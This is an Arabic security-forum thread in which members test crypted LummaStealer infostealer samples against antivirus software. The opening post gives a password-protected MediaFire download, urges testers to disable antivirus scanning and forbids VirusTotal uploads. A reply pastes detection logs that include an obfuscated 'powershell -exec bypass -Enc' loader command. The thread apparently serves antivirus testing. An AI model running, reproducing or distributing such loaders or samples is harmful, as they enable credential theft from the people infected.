• [ يمنع ] طرح أي موضوع يحوي على كراكات أو باتشات او كيجنات من غير فحصها عبر موقع فيروس توتال [ virustotal.com ] وطرح رابط الفحص ضِمن الموضوع.

تشفيرة LummaStealer 3x بتاريخ 11/27/2024

tiktoshi

tiktoshitiktoshi is verified member.

(خبراء زيزووم)
★★ نجم المنتدى ★★
نجم الشهر
كبار الشخصيات
إنضم
14 يوليو 2014
المشاركات
4,792
مستوى التفاعل
19,415
النقاط
1,995
غير متصل
JqZJplx.gif



مطلوب تجربته بالتشغيل
ولو اكتشفه برنامج الحماية بفك الضغط او الفحص نظراً للتوقيع المبهم
اوقف محرك الفحص وجرب بالتشغيل

(ممنوع الرفع على فايرس توتال)

الخبراء بس هما اللى يجربوا
وتجميد النظام ضرورى جدا


tvUCeTo.png


www.mediafire.com

mal-3x

MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com

باس infected
 

توقيع : tiktoshitiktoshi is verified member.
توقيع : Ramy BadraanRamy Badraan is verified member.
الملف الاول مش شغال
والتانى والتالت دخلوا النار
1732724769540.webp

1732724605136.webp


1732724890215.webp
 
توقيع : Ramy BadraanRamy Badraan is verified member.
Ramy Badraan قال:
قبل ما اجرب
انت استأذنت قبل ما تستخدم تصميمى فى البوست ؟؟ :222rolleyes: :222rolleyes:
هغيره هعمل واحد تانى
انا وانت مينفعش نشترك فى حاجة واحدة
أنقر للتوسيع...
🤣🤣🤣🤣🤣🤣🤣🤣
 
توقيع : tiktoshitiktoshi is verified member.
ملف 1

ستبقى لك في ذاكرة.. تفعيل حماية ذاكرة لوحدها مع تعطيل كل حماية


كود: 
Detection: Trojan/ShellLoader.oh
Detection ID: 625B67F2839542CF
Virtual address: 0x0000000071A30000
Mapping size: 1.5MB
Is it fully mapped: yes
Data flow hash: e80251d9
Result: disposed
Process ID: 3988
Process: C:\Windows\SysWOW64\more.com
Process Command line: C:\Windows\SysWOW64\more.com
Parent Process ID: 8092
Parent: C:\Users\tik\Desktop\mal-3x\mal1\Set-up.exe
Parent process Command line: "C:\Users\tik\Desktop\mal-3x\mal1\Set-up.exe"

كود: 
Detection: HEUR:Trojan/Hijack.o
Detection ID: 090EB5C703C21A9D
Virtual address: 0x0000000000A01000
Mapping size: 19.7MB
Is it fully mapped: yes
Data flow hash: c0fe1a1c
Result: disposed
Process ID: 7500
Process: C:\Users\tik\AppData\Local\86a0f7b4-749c-4dda-a34f-35e1cee59d7c\VCDDaemon.exe
Process Command line: "C:\Users\tik\AppData\Local\86a0f7b4-749c-4dda-a34f-35e1cee59d7c\VCDDaemon.exe"
Parent Process ID: 7092
Parent: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process Command line: powershell -exec bypass -Enc JAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAPQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMACgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AMwA2ADAALgBuAGUAdAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4AQwBsAG8AcwBlACgAKQAKAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxAAoACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGIAYQBpAGQAdQAuAGMAbwBtACIAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAKACAAIAAgACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbA
 
توقيع : tiktoshitiktoshi is verified member.
يجب تسجيل الدخول أو التسجيل كي تتمكن من الرد هنا.
عودة
أعلى